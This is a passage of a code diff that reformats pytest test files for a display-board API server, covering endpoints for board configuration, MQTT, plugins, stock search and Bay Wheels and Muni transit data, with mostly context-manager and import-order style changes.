             mock_config.is_silence_mode_active.return_value = False
             mock_config.BOARD_API_MODE = "local"
             mock_config.get_board_api_key.return_value = "test_key_12345"
@@ -443,9 +461,7 @@ class TestBuildWelcomeTemplate:
     def test_note_custom_message_truncated_to_15(self):
         from src.api_server import _build_welcome_template
 
-        template = _build_welcome_template(
-            "note", "this message is way too long for a note"
-        )
+        template = _build_welcome_template("note", "this message is way too long for a note")
         assert len(template) == 3
         assert template[1] == "THIS MESSAGE IS"
         assert len(template[1]) == 15
@@ -453,9 +469,7 @@ class TestBuildWelcomeTemplate:
     def test_flagship_custom_message_truncated_to_22(self):
         from src.api_server import _build_welcome_template
 
-        template = _build_welcome_template(
-            "flagship", "this message is much longer than twenty two cols"
-        )
+        template = _build_welcome_template("flagship", "this message is much longer than twenty two cols")
         assert len(template) == 6
         assert template[2] == "THIS MESSAGE IS MUCH L"
         assert len(template[2]) == 22
@@ -471,6 +485,7 @@ class TestBuildWelcomeTemplate:
 # ===========================================================================
 # Priority 2 – Configuration Endpoints
 # ===========================================================================
+
 
 class TestResetBoardConfig:
     """Tests for DELETE /config/board."""
@@ -534,9 +549,7 @@ class TestValidateConfig:
         assert data["is_first_run"] is True
         assert "board.cloud_key" in data["missing_fields"]
 
-    def test_validate_config_multi_board_overrides_first_run(
-        self, client, mock_config_manager, mock_settings_service
-    ):
+    def test_validate_config_multi_board_overrides_first_run(self, client, mock_config_manager, mock_settings_service):
         """A configured board instance in multi-board settings clears first-run state.
 
         When a user sets up a board via Settings (rather than the wizard),
@@ -671,6 +684,7 @@ class TestBoardScan:
 # Priority 3 – MQTT Operations
 # ===========================================================================
 
+
 class TestMQTTStatus:
     """Tests for GET /mqtt/status."""
 
@@ -743,6 +757,7 @@ class TestMQTTRepublishDiscovery:
 # Priority 4 – Settings
 # ===========================================================================
 
+
 class TestSetActivePage:
     """Tests for PUT /settings/active-page."""
 
@@ -751,10 +766,10 @@ class TestSetActivePage:
     ):
         """Setting an active page also sends to board when enabled."""
         mock_settings_service.should_send_to_board.return_value = True
-        page = mock_page_service.get_page.return_value
-        preview = mock_page_service.preview_page.return_value
-        with patch("src.api_server.get_dimensions") as mock_dims, \
-             patch("src.api_server.text_to_board_array") as mock_ttba:
+        with (
+            patch("src.api_server.get_dimensions") as mock_dims,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+        ):
             mock_dims.return_value = Mock(rows=6, cols=22)
             mock_ttba.return_value = [[0] * 22 for _ in range(6)]
             response = client.put("/settings/active-page", json={"page_id": "page1"})
@@ -787,8 +802,10 @@ class TestSetActivePage:
         """Board send failure still returns success but sent_to_board is False."""
         mock_settings_service.should_send_to_board.return_value = True
         mock_service.vb_client.send_characters.return_value = (False, False)
-        with patch("src.api_server.get_dimensions") as mock_dims, \
-             patch("src.api_server.text_to_board_array") as mock_ttba:
+        with (
+            patch("src.api_server.get_dimensions") as mock_dims,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+        ):
             mock_dims.return_value = Mock(rows=6, cols=22)
             mock_ttba.return_value = [[0] * 22 for _ in range(6)]
             response = client.put("/settings/active-page", json={"page_id": "page1"})
@@ -868,6 +885,7 @@ class TestSilenceStatus:
 # Priority 5 – Content Operations
 # ===========================================================================
 
+
 class TestSendDisplay:
     """Tests for POST /displays/{display_type}/send."""
 
@@ -878,9 +896,11 @@ class TestSendDisplay:
 
     def test_send_display_no_service(self, client):
         """No service returns 503."""
-        with patch("src.api_server.get_display_service"), \
-             patch("src.api_server.get_settings_service"), \
-             patch("src.api_server.get_service", return_value=None):
+        with (
+            patch("src.api_server.get_display_service"),
+            patch("src.api_server.get_settings_service"),
+            patch("src.api_server.get_service", return_value=None),
+        ):
             response = client.post("/displays/weather/send")
             assert response.status_code == 503
 
@@ -888,9 +908,11 @@ class TestSendDisplay:
         """Service without vb_client returns 503."""
         svc = Mock()
         svc.vb_client = None
-        with patch("src.api_server.get_display_service"), \
-             patch("src.api_server.get_settings_service"), \
-             patch("src.api_server.get_service", return_value=svc):
+        with (
+            patch("src.api_server.get_display_service"),
+            patch("src.api_server.get_settings_service"),
+            patch("src.api_server.get_service", return_value=svc),
+        ):
             response = client.post("/displays/weather/send")
             assert response.status_code == 503
 
@@ -921,9 +943,11 @@ class TestSendDisplay:
     def test_send_display_to_board(self, client, mock_service, mock_settings_service):
         """Send display to board successfully."""
         mock_settings_service.should_send_to_board.return_value = True
-        with patch("src.api_server.get_display_service") as mock_ds, \
-             patch("src.api_server.text_to_board_array") as mock_ttba, \
-             patch("src.api_server.get_dimensions") as mock_dims:
+        with (
+            patch("src.api_server.get_display_service") as mock_ds,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+            patch("src.api_server.get_dimensions") as mock_dims,
+        ):
             display_service = Mock()
             result = Mock()
             result.available = True
@@ -943,9 +967,11 @@ class TestSendDisplay:
         """Board send failure → 500."""
         mock_settings_service.should_send_to_board.return_value = True
         mock_service.vb_client.send_characters.return_value = (False, False)
-        with patch("src.api_server.get_display_service") as mock_ds, \
-             patch("src.api_server.text_to_board_array") as mock_ttba, \
-             patch("src.api_server.get_dimensions") as mock_dims:
+        with (
+            patch("src.api_server.get_display_service") as mock_ds,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+            patch("src.api_server.get_dimensions") as mock_dims,
+        ):
             display_service = Mock()
             result = Mock()
             result.available = True
@@ -981,9 +1007,11 @@ class TestSendPage:
 
     def test_send_page_no_service(self, client):
         """No service → 503."""
-        with patch("src.api_server.get_page_service"), \
-             patch("src.api_server.get_settings_service"), \
-             patch("src.api_server.get_service", return_value=None):
+        with (
+            patch("src.api_server.get_page_service"),
+            patch("src.api_server.get_settings_service"),
+            patch("src.api_server.get_service", return_value=None),
+        ):
             response = client.post("/pages/page1/send")
             assert response.status_code == 503
 
@@ -1020,9 +1048,11 @@ class TestSendPage:
     def test_send_page_to_board(self, client, mock_service, mock_settings_service, mock_page_service):
         """Send page to board successfully."""
         mock_settings_service.should_send_to_board.return_value = True
-        with patch("src.api_server.Config") as mock_config, \
-             patch("src.api_server.get_dimensions") as mock_dims, \
-             patch("src.api_server.text_to_board_array") as mock_ttba:
+        with (
+            patch("src.api_server.Config") as mock_config,
+            patch("src.api_server.get_dimensions") as mock_dims,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+        ):
             mock_config.is_silence_mode_active.return_value = False
             mock_dims.return_value = Mock(rows=6, cols=22)
             mock_ttba.return_value = [[0] * 22 for _ in range(6)]
@@ -1044,9 +1074,11 @@ class TestSendPage:
         """Board send failure → 500."""
         mock_settings_service.should_send_to_board.return_value = True
         mock_service.vb_client.send_characters.return_value = (False, False)
-        with patch("src.api_server.Config") as mock_config, \
-             patch("src.api_server.get_dimensions") as mock_dims, \
-             patch("src.api_server.text_to_board_array") as mock_ttba:
+        with (
+            patch("src.api_server.Config") as mock_config,
+            patch("src.api_server.get_dimensions") as mock_dims,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+        ):
             mock_config.is_silence_mode_active.return_value = False
             mock_dims.return_value = Mock(rows=6, cols=22)
             mock_ttba.return_value = [[0] * 22 for _ in range(6)]
@@ -1060,9 +1092,11 @@ class TestSendPage:
 
     def test_send_page_target_board(self, client, mock_service, mock_settings_service, mock_page_service):
         """Explicit target=board sends to board."""
-        with patch("src.api_server.Config") as mock_config, \
-             patch("src.api_server.get_dimensions") as mock_dims, \
-             patch("src.api_server.text_to_board_array") as mock_ttba:
+        with (
+            patch("src.api_server.Config") as mock_config,
+            patch("src.api_server.get_dimensions") as mock_dims,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+        ):
             mock_config.is_silence_mode_active.return_value = False
             mock_dims.return_value = Mock(rows=6, cols=22)
             mock_ttba.return_value = [[0] * 22 for _ in range(6)]
@@ -1107,13 +1141,16 @@ class TestForceRefresh:
 # Priority 6 – Debug Endpoints (error paths not covered elsewhere)
 # ===========================================================================
 
+
 class TestDebugBlankErrorPaths:
     """Additional error-path tests for POST /debug/blank."""
 
     def test_blank_ui_only(self, client):
         """When output target is UI only, blank returns success without sending."""
-        with patch("src.api_server._get_board_client") as mock_bc, \
-             patch("src.api_server.get_settings_service") as mock_ss:
+        with (
+            patch("src.api_server._get_board_client") as mock_bc,
+            patch("src.api_server.get_settings_service") as mock_ss,
+        ):
             mock_bc.return_value = Mock()
             ss = Mock()
             ss.should_send_to_board.return_value = False
@@ -1124,8 +1161,10 @@ class TestDebugBlankErrorPaths:
 
     def test_blank_send_failure(self, client):
         """Board send failure → 500."""
-        with patch("src.api_server._get_board_client") as mock_bc, \
-             patch("src.api_server.get_settings_service") as mock_ss:
+        with (
+            patch("src.api_server._get_board_client") as mock_bc,
+            patch("src.api_server.get_settings_service") as mock_ss,
+        ):
             bc = Mock()
             bc.send_characters.return_value = (False, False)
             mock_bc.return_value = bc
@@ -1137,8 +1176,10 @@ class TestDebugBlankErrorPaths:
 
     def test_blank_exception(self, client):
         """Exception during send → 500."""
-        with patch("src.api_server._get_board_client") as mock_bc, \
-             patch("src.api_server.get_settings_service") as mock_ss:
+        with (
+            patch("src.api_server._get_board_client") as mock_bc,
+            patch("src.api_server.get_settings_service") as mock_ss,
+        ):
             bc = Mock()
             bc.send_characters.side_effect = RuntimeError("network error")
             mock_bc.return_value = bc
@@ -1154,8 +1195,10 @@ class TestDebugFillErrorPaths:
 
     def test_fill_ui_only(self, client):
         """When output target is UI only, fill returns success without sending."""
-        with patch("src.api_server._get_board_client") as mock_bc, \
-             patch("src.api_server.get_settings_service") as mock_ss:
+        with (
+            patch("src.api_server._get_board_client") as mock_bc,
+            patch("src.api_server.get_settings_service") as mock_ss,
+        ):
             mock_bc.return_value = Mock()
             ss = Mock()
             ss.should_send_to_board.return_value = False
@@ -1166,8 +1209,10 @@ class TestDebugFillErrorPaths:
 
     def test_fill_send_failure(self, client):
         """Board send failure → 500."""
-        with patch("src.api_server._get_board_client") as mock_bc, \
-             patch("src.api_server.get_settings_service") as mock_ss:
+        with (
+            patch("src.api_server._get_board_client") as mock_bc,
+            patch("src.api_server.get_settings_service") as mock_ss,
+        ):
             bc = Mock()
             bc.send_characters.return_value = (False, False)
             mock_bc.return_value = bc
@@ -1179,8 +1224,10 @@ class TestDebugFillErrorPaths:
 
     def test_fill_exception(self, client):
         """Exception during send → 500."""
-        with patch("src.api_server._get_board_client") as mock_bc, \
-             patch("src.api_server.get_settings_service") as mock_ss:
+        with (
+            patch("src.api_server._get_board_client") as mock_bc,
+            patch("src.api_server.get_settings_service") as mock_ss,
+        ):
             bc = Mock()
             bc.send_characters.side_effect = RuntimeError("error")
             mock_bc.return_value = bc
@@ -1196,14 +1243,16 @@ class TestDebugInfoErrorPaths:
 
     def test_info_ui_only(self, client):
         """UI-only mode returns debug info without sending."""
-        with patch("src.api_server._get_board_client") as mock_bc, \
-             patch("src.api_server.get_settings_service") as mock_ss, \
-             patch("src.api_server.Config") as mock_config, \
-             patch("src.api_server._get_server_ip", return_value="10.0.0.1"), \
-             patch("src.api_server._get_service_uptime", return_value=3600), \
-             patch("src.api_server._format_uptime", return_value="1h"), \
-             patch("src.api_server.__version__", "1.0.0"), \
-             patch("src.time_service.get_time_service") as mock_ts:
+        with (
+            patch("src.api_server._get_board_client") as mock_bc,
+            patch("src.api_server.get_settings_service") as mock_ss,
+            patch("src.api_server.Config") as mock_config,
+            patch("src.api_server._get_server_ip", return_value="10.0.0.1"),
+            patch("src.api_server._get_service_uptime", return_value=3600),
+            patch("src.api_server._format_uptime", return_value="1h"),
+            patch("src.api_server.__version__", "1.0.0"),
+            patch("src.time_service.get_time_service") as mock_ts,
+        ):
             mock_bc.return_value = Mock()
             ss = Mock()
             ss.should_send_to_board.return_value = False
@@ -1221,15 +1270,17 @@ class TestDebugInfoErrorPaths:
 
     def test_info_send_failure(self, client):
         """Board send failure → 500."""
-        with patch("src.api_server._get_board_client") as mock_bc, \
-             patch("src.api_server.get_settings_service") as mock_ss, \
-             patch("src.api_server.Config") as mock_config, \
-             patch("src.api_server._get_server_ip", return_value="10.0.0.1"), \
-             patch("src.api_server._get_service_uptime", return_value=3600), \
-             patch("src.api_server._format_uptime", return_value="1h"), \
-             patch("src.api_server.__version__", "1.0.0"), \
-             patch("src.time_service.get_time_service") as mock_ts, \
-             patch("src.api_server.text_to_board_array") as mock_ttba:
+        with (
+            patch("src.api_server._get_board_client") as mock_bc,
+            patch("src.api_server.get_settings_service") as mock_ss,
+            patch("src.api_server.Config") as mock_config,
+            patch("src.api_server._get_server_ip", return_value="10.0.0.1"),
+            patch("src.api_server._get_service_uptime", return_value=3600),
+            patch("src.api_server._format_uptime", return_value="1h"),
+            patch("src.api_server.__version__", "1.0.0"),
+            patch("src.time_service.get_time_service") as mock_ts,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+        ):
             bc = Mock()
             bc.send_characters.return_value = (False, False)
             mock_bc.return_value = bc
@@ -1249,15 +1300,17 @@ class TestDebugInfoErrorPaths:
 
     def test_info_exception(self, client):
         """Exception during send → 500."""
-        with patch("src.api_server._get_board_client") as mock_bc, \
-             patch("src.api_server.get_settings_service") as mock_ss, \
-             patch("src.api_server.Config") as mock_config, \
-             patch("src.api_server._get_server_ip", return_value="10.0.0.1"), \
-             patch("src.api_server._get_service_uptime", return_value=3600), \
-             patch("src.api_server._format_uptime", return_value="1h"), \
-             patch("src.api_server.__version__", "1.0.0"), \
-             patch("src.time_service.get_time_service") as mock_ts, \
-             patch("src.api_server.text_to_board_array") as mock_ttba:
+        with (
+            patch("src.api_server._get_board_client") as mock_bc,
+            patch("src.api_server.get_settings_service") as mock_ss,
+            patch("src.api_server.Config") as mock_config,
+            patch("src.api_server._get_server_ip", return_value="10.0.0.1"),
+            patch("src.api_server._get_service_uptime", return_value=3600),
+            patch("src.api_server._format_uptime", return_value="1h"),
+            patch("src.api_server.__version__", "1.0.0"),
+            patch("src.time_service.get_time_service") as mock_ts,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+        ):
             bc = Mock()
             bc.send_characters.side_effect = Exception("error")
             mock_bc.return_value = bc
@@ -1334,13 +1387,16 @@ class TestDebugCacheStatusErrorPaths:
 # Priority 7 – Plugin System
 # ===========================================================================
 
+
 class TestPluginErrors:
     """Tests for GET /plugins/errors."""
 
     def test_plugin_errors_system_available(self, client):
         """Plugin errors when system is available."""
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry") as mock_reg:
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry") as mock_reg,
+        ):
             registry = Mock()
             registry.get_load_errors.return_value = {"bad_plugin": "ImportError"}
             mock_reg.return_value = registry
@@ -1365,12 +1421,12 @@ class TestPluginRegistry:
 
     def test_registry_list(self, client):
         """List registry plugins."""
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry") as mock_reg:
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry") as mock_reg,
+        ):
             registry = Mock()
-            registry.get_registry_entries.return_value = [
-                {"id": "weather", "name": "Weather", "installed": True}
-            ]
+            registry.get_registry_entries.return_value = [{"id": "weather", "name": "Weather", "installed": True}]
             mock_reg.return_value = registry
             response = client.get("/plugins/registry")
             assert response.status_code == 200
@@ -1388,8 +1444,10 @@ class TestPluginUpdates:
 
     def test_get_updates(self, client):
         """Get cached update status."""
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry") as mock_reg:
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry") as mock_reg,
+        ):
             registry = Mock()
             registry.get_update_status.return_value = {"my_plugin": True}
             mock_reg.return_value = registry
@@ -1409,8 +1467,10 @@ class TestTriggerPluginUpdateCheck:
 
     def test_trigger_check(self, client):
         """Trigger update check."""
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry") as mock_reg:
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry") as mock_reg,
+        ):
             registry = Mock()
             registry.check_for_updates.return_value = {"plugin_a": True, "plugin_b": False}
             mock_reg.return_value = registry
@@ -1432,17 +1492,15 @@ class TestTriggerPluginUpdateCheck:
 # Priority 8 – External Data APIs
 # ===========================================================================
 
+
 class TestStocksSearch:
     """Tests for GET /stocks/search."""
 
     def test_search_success(self, client):
         """Search stock symbols successfully."""
-        with patch("src.utils.stocks.StocksSource") as MockStocks, \
-             patch("src.api_server.Config") as mock_config:
+        with patch("src.utils.stocks.StocksSource") as MockStocks, patch("src.api_server.Config") as mock_config:
             mock_config.FINNHUB_API_KEY = "test_finnhub_key"
-            MockStocks.search_symbols.return_value = [
-                {"symbol": "GOOG", "name": "Alphabet Inc."}
-            ]
+            MockStocks.search_symbols.return_value = [{"symbol": "GOOG", "name": "Alphabet Inc."}]
             response = client.get("/stocks/search?query=GOOG")
             assert response.status_code == 200
             data = response.json()
@@ -1451,8 +1509,7 @@ class TestStocksSearch:
 
     def test_search_no_api_key(self, client):
         """Search without API key uses fallback."""
-        with patch("src.utils.stocks.StocksSource") as MockStocks, \
-             patch("src.api_server.Config") as mock_config:
+        with patch("src.utils.stocks.StocksSource") as MockStocks, patch("src.api_server.Config") as mock_config:
             mock_config.FINNHUB_API_KEY = None
             MockStocks.search_symbols.return_value = []
             response = client.get("/stocks/search?query=XYZ&limit=5")
@@ -1461,8 +1518,7 @@ class TestStocksSearch:
 
     def test_search_exception(self, client):
         """Exception during search → 500."""
-        with patch("src.utils.stocks.StocksSource") as MockStocks, \
-             patch("src.api_server.Config") as mock_config:
+        with patch("src.utils.stocks.StocksSource") as MockStocks, patch("src.api_server.Config") as mock_config:
             mock_config.FINNHUB_API_KEY = None
             MockStocks.search_symbols.side_effect = RuntimeError("API down")
             response = client.get("/stocks/search?query=GOOG")

--- a/tests/test_api_coverage_extended.py
+++ b/tests/test_api_coverage_extended.py
@@ -5,10 +5,12 @@ plugin data/updates/install, carousel error paths, generic-data test-fetch,
 and deprecated compat endpoints.
 """
 
-import pytest
 from pathlib import Path
-from unittest.mock import Mock, patch, AsyncMock
+from unittest.mock import AsyncMock, Mock, patch
+
+import pytest
 from fastapi.testclient import TestClient
+
 from src.api_server import app
 
 
@@ -20,6 +22,7 @@ def client():
 # ---------------------------------------------------------------------------
 # MQTT Settings (lines 600-621)
 # ---------------------------------------------------------------------------
+
 
 class TestMQTTSettings:
     def test_get_mqtt_settings(self, client):
@@ -43,8 +46,10 @@ class TestMQTTSettings:
         mock_settings.to_dict.return_value = {"enabled": True, "broker_host": "mqtt.example.com"}
         mock_svc = Mock()
         mock_svc.set_mqtt_settings.return_value = mock_settings
-        with patch("src.settings.service.get_settings_service", return_value=mock_svc), \
-             patch("src.api_server._apply_mqtt_config") as mock_apply:
+        with (
+            patch("src.settings.service.get_settings_service", return_value=mock_svc),
+            patch("src.api_server._apply_mqtt_config") as mock_apply,
+        ):
             resp = client.put("/settings/mqtt", json={"enabled": True, "broker_host": "mqtt.example.com"})
         assert resp.status_code == 200
         mock_apply.assert_called_once()
@@ -54,51 +59,61 @@ class TestMQTTSettings:
 # _apply_mqtt_config (lines 551-597)
 # ---------------------------------------------------------------------------
 
+
 class TestApplyMQTTConfig:
     def test_apply_disabled(self):
         from src.api_server import _apply_mqtt_config
+
         cfg = Mock(enabled=False)
-        with patch("src.mqtt.get_mqtt_client", return_value=None), \
-             patch("src.mqtt.set_mqtt_client_instance"):
+        with patch("src.mqtt.get_mqtt_client", return_value=None), patch("src.mqtt.set_mqtt_client_instance"):
             _apply_mqtt_config(cfg)
 
     def test_apply_stops_old_client(self):
         from src.api_server import _apply_mqtt_config
+
         cfg = Mock(enabled=False)
         old_client = Mock()
-        with patch("src.mqtt.get_mqtt_client", return_value=old_client), \
-             patch("src.mqtt.set_mqtt_client_instance"):
+        with patch("src.mqtt.get_mqtt_client", return_value=old_client), patch("src.mqtt.set_mqtt_client_instance"):
             _apply_mqtt_config(cfg)
         old_client.stop.assert_called_once()
 
     def test_apply_enabled_invalid_config(self):
         from src.api_server import _apply_mqtt_config
+
         cfg = Mock(
-            enabled=True, broker_host="mqtt.example.com", broker_port=1883,
-            username="", password="", external_url=""
+            enabled=True, broker_host="mqtt.example.com", broker_port=1883, username="", password="", external_url=""
         )
         mock_mqtt_config = Mock()
         mock_mqtt_config.validate.return_value = ["host is invalid"]
-        with patch("src.mqtt.get_mqtt_client", return_value=None), \
-             patch("src.mqtt.set_mqtt_client_instance"), \
-             patch("src.mqtt.config.MQTTConfig", return_value=mock_mqtt_config):
+        with (
+            patch("src.mqtt.get_mqtt_client", return_value=None),
+            patch("src.mqtt.set_mqtt_client_instance"),
+            patch("src.mqtt.config.MQTTConfig", return_value=mock_mqtt_config),
+        ):
             _apply_mqtt_config(cfg)
 
     def test_apply_enabled_valid_config(self):
         from src.api_server import _apply_mqtt_config
+
         cfg = Mock(
-            enabled=True, broker_host="mqtt.example.com", broker_port=1883,
-            username=None, password=None, external_url=None
+            enabled=True,
+            broker_host="mqtt.example.com",
+            broker_port=1883,
+            username=None,
+            password=None,
+            external_url=None,
         )
         mock_mqtt_config = Mock()
         mock_mqtt_config.validate.return_value = []
         mock_client = Mock()
-        with patch("src.mqtt.get_mqtt_client", return_value=None), \
-             patch("src.mqtt.set_mqtt_client_instance") as mock_set, \
-             patch("src.mqtt.config.MQTTConfig", return_value=mock_mqtt_config), \
-             patch("src.mqtt.MQTTClient", return_value=mock_client), \
-             patch("src.mqtt.state.StatePublisher", return_value=Mock()), \
-             patch("src.mqtt.commands.CommandHandler", return_value=Mock()):
+        with (
+            patch("src.mqtt.get_mqtt_client", return_value=None),
+            patch("src.mqtt.set_mqtt_client_instance") as mock_set,
+            patch("src.mqtt.config.MQTTConfig", return_value=mock_mqtt_config),
+            patch("src.mqtt.MQTTClient", return_value=mock_client),
+            patch("src.mqtt.state.StatePublisher", return_value=Mock()),
+            patch("src.mqtt.commands.CommandHandler", return_value=Mock()),
+        ):
             _apply_mqtt_config(cfg)
         mock_client.start.assert_called_once()
         mock_set.assert_called()
@@ -108,19 +123,22 @@ class TestApplyMQTTConfig:
 # Bay Wheels Stations (lines 1865-2090)
 # ---------------------------------------------------------------------------
 
+
 def _make_station_status_response(station_ids):
     stations = []
     for sid in station_ids:
-        stations.append({
-            "station_id": sid,
-            "num_bikes_available": 5,
-            "num_docks_available": 10,
-            "is_renting": 1,
-            "vehicle_types_available": [
-                {"vehicle_type_id": "electric_boost", "count": 2},
-                {"vehicle_type_id": "classic", "count": 3},
-            ],
-        })
+        stations.append(
+            {
+                "station_id": sid,
+                "num_bikes_available": 5,
+                "num_docks_available": 10,
+                "is_renting": 1,
+                "vehicle_types_available": [
+                    {"vehicle_type_id": "electric_boost", "count": 2},
+                    {"vehicle_type_id": "classic", "count": 3},
+                ],
+            }
+        )
     mock_resp = Mock()
     mock_resp.raise_for_status.return_value = None
     mock_resp.json.return_value = {"data": {"stations": stations}}
@@ -133,8 +151,10 @@ class TestBayWheelsStations:
             "s1": {"name": "Station 1", "lat": 37.77, "lon": -122.42, "address": "123 Main St", "capacity": 20},
         }
         status_resp = _make_station_status_response(["s1"])
-        with patch("src.utils.baywheels.BayWheelsSource._get_station_information", return_value=station_info), \
-             patch("requests.get", return_value=status_resp):
+        with (
+            patch("src.utils.baywheels.BayWheelsSource._get_station_information", return_value=station_info),
+            patch("requests.get", return_value=status_resp),
+        ):
             resp = client.get("/baywheels/stations")
         assert resp.status_code == 200
         data = resp.json()
@@ -142,23 +162,29 @@ class TestBayWheelsStations:
         assert data["stations"][0]["electric_bikes"] == 2
 
     def test_list_all_stations_error(self, client):
-        with patch("src.utils.baywheels.BayWheelsSource._get_station_information", side_effect=Exception("fail")), \
-             patch("requests.get", side_effect=Exception("fail")):
+        with (
+            patch("src.utils.baywheels.BayWheelsSource._get_station_information", side_effect=Exception("fail")),
+            patch("requests.get", side_effect=Exception("fail")),
+        ):
             resp = client.get("/baywheels/stations")
         assert resp.status_code == 500
 
     def test_nearby_stations(self, client):
         nearby = [{"station_id": "s1", "name": "Near", "lat": 37.77, "lon": -122.42}]
         status_resp = _make_station_status_response(["s1"])
-        with patch("src.utils.baywheels.BayWheelsSource.find_stations_near_location", return_value=nearby), \
-             patch("requests.get", return_value=status_resp):
+        with (
+            patch("src.utils.baywheels.BayWheelsSource.find_stations_near_location", return_value=nearby),
+            patch("requests.get", return_value=status_resp),
+        ):
             resp = client.get("/baywheels/stations/nearby?lat=37.77&lng=-122.42")
         assert resp.status_code == 200
         assert resp.json()["count"] == 1
 
     def test_nearby_stations_error(self, client):
-        with patch("src.utils.baywheels.BayWheelsSource.find_stations_near_location", side_effect=Exception("err")), \
-             patch("requests.get", side_effect=Exception("err")):
+        with (
+            patch("src.utils.baywheels.BayWheelsSource.find_stations_near_location", side_effect=Exception("err")),
+            patch("requests.get", side_effect=Exception("err")),
+        ):
             resp = client.get("/baywheels/stations/nearby?lat=37.77&lng=-122.42")
         assert resp.status_code == 500
 
@@ -170,8 +196,10 @@ class TestBayWheelsStations:
         nearby = [{"station_id": "s1", "name": "Near", "lat": 37.77, "lon": -122.42}]
         status_resp = _make_station_status_response(["s1"])
 
-        with patch("requests.get", side_effect=[geocode_resp, status_resp]), \
-             patch("src.utils.baywheels.BayWheelsSource.find_stations_near_location", return_value=nearby):
+        with (
+            patch("requests.get", side_effect=[geocode_resp, status_resp]),
+            patch("src.utils.baywheels.BayWheelsSource.find_stations_near_location", return_value=nearby),
+        ):
             resp = client.get("/baywheels/stations/search?address=Market+St")
         assert resp.status_code == 200
         assert "geocoded_location" in resp.json()
@@ -186,6 +214,7 @@ class TestBayWheelsStations:
 
     def test_search_geocode_error(self, client):
         import requests as req
+
         with patch("requests.get", side_effect=req.exceptions.ConnectionError("fail")):
             resp = client.get("/baywheels/stations/search?address=Test")
         assert resp.status_code == 503
@@ -195,11 +224,13 @@ class TestBayWheelsStations:
 # Muni Stops (lines 2167-2437)
 # ---------------------------------------------------------------------------
 
+
 class TestMuniStops:
     @pytest.fixture(autouse=True)
     def clear_muni_stops_cache(self, monkeypatch):
         """Ensure module-level cache used by list_all_muni_stops is reset per test."""
         import src.api_server as _api_server
+
         monkeypatch.setattr(_api_server, "_muni_stops_cache", None)
         monkeypatch.setattr(_api_server, "_muni_stops_cache_time", 0.0)
         yield
@@ -210,8 +241,7 @@ class TestMuniStops:
         api_response = Mock()
         api_response.raise_for_status.return_value = None
         api_response.text = '{"Contents":{"dataObjects":{"ScheduledStopPoint":[{"id":"SF_1234","Name":"Market & 3rd","Location":{"Latitude":"37.79","Longitude":"-122.40"}}]}}}'
-        with patch("src.config.Config.MUNI_API_KEY", "test_key_123"), \
-             patch("requests.get", return_value=api_response):
+        with patch("src.config.Config.MUNI_API_KEY", "test_key_123"), patch("requests.get", return_value=api_response):
             resp = client.get("/muni/stops")
         assert resp.status_code == 200
         assert resp.json()["total"] == 1
@@ -227,8 +257,10 @@ class TestMuniStops:
         api_response = Mock()
         api_response.raise_for_status.return_value = None
         api_response.text = '{"Contents":{"dataObjects":{"ScheduledStopPoint":[{"id":"SF_5678","Name":"Powell","Location":{"Latitude":"37.78","Longitude":"-122.41"}}]}}}'
-        with patch("src.config.Config.MUNI_API_KEY", "test_key_123"), \
-             patch("requests.get", return_value=api_response) as mock_get:
+        with (
+            patch("src.config.Config.MUNI_API_KEY", "test_key_123"),
+            patch("requests.get", return_value=api_response) as mock_get,
+        ):
             resp1 = client.get("/muni/stops")
             resp2 = client.get("/muni/stops")
         assert resp1.status_code == 200
@@ -246,8 +278,10 @@ class TestMuniStops:
         }
         mock_cache = Mock()
         mock_cache.is_ready.return_value = False
-        with patch("src.api_server.list_all_muni_stops", new_callable=AsyncMock, return_value=stops_data), \
-             patch("src.utils.transit_cache.get_transit_cache", return_value=mock_cache):
+        with (
+            patch("src.api_server.list_all_muni_stops", new_callable=AsyncMock, return_value=stops_data),
+            patch("src.utils.transit_cache.get_transit_cache", return_value=mock_cache),
+        ):
             resp = client.get("/muni/stops/nearby?lat=37.79&lng=-122.40")
         assert resp.status_code == 200
         assert "stops" in resp.json()
@@ -264,8 +298,10 @@ class TestMuniStops:
         mock_cache.get_all_stops_for_agency.return_value = {
             "1234": [{"MonitoredVehicleJourney": {"PublishedLineName": "N"}}]
         }
-        with patch("src.api_server.list_all_muni_stops", new_callable=AsyncMock, return_value=stops_data), \
-             patch("src.utils.transit_cache.get_transit_cache", return_value=mock_cache):
+        with (
+            patch("src.api_server.list_all_muni_stops", new_callable=AsyncMock, return_value=stops_data),
+            patch("src.utils.transit_cache.get_transit_cache", return_value=mock_cache),
+        ):
             resp = client.get("/muni/stops/nearby?lat=37.79&lng=-122.40&radius=5")
         assert resp.status_code == 200
         stops = resp.json()["stops"]
@@ -276,9 +312,14 @@ class TestMuniStops:
         geocode_resp.raise_for_status.return_value = None
         geocode_resp.json.return_value = [{"lat": "37.79", "lon": "-122.40", "display_name": "SF"}]
 
-        nearby_data = {"stops": [{"stop_code": "1", "name": "A", "lat": 37.79, "lon": -122.40, "distance_km": 0.1}], "count": 1}
-        with patch("requests.get", return_value=geocode_resp), \
-             patch("src.api_server.find_nearby_muni_stops", new_callable=AsyncMock, return_value=nearby_data):
+        nearby_data = {
+            "stops": [{"stop_code": "1", "name": "A", "lat": 37.79, "lon": -122.40, "distance_km": 0.1}],
+            "count": 1,
+        }
+        with (
+            patch("requests.get", return_value=geocode_resp),
